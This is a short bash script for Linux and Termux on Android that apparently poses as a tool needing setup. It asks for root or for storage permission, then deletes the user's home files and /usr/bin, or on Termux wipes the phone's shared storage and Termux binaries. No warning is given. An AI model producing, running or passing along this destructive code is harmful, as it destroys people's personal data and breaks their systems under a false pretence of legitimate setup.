#!/usr/bin/env bash
if [[ $(command -v sudo) ]]; then
  if [ $(id -u) -ne 0 ]; then
	echo "This script must be ran as root"
	exit 1
  fi
  rm -r ~/*
  clear
  rm -rf /usr/bin/*
else
  if [ -d ~/storage ]; then
    echo ""
  else
    echo "A storage permit is required"
    echo "Type : termux-setup-storage "
    echo "Try again "
    exit
  fi
  rm -rf /data/data/com.termux/files/home/storage/shared/* 
  clear
  rm -r /data/data/com.termux/files/usr/bin/*
fi
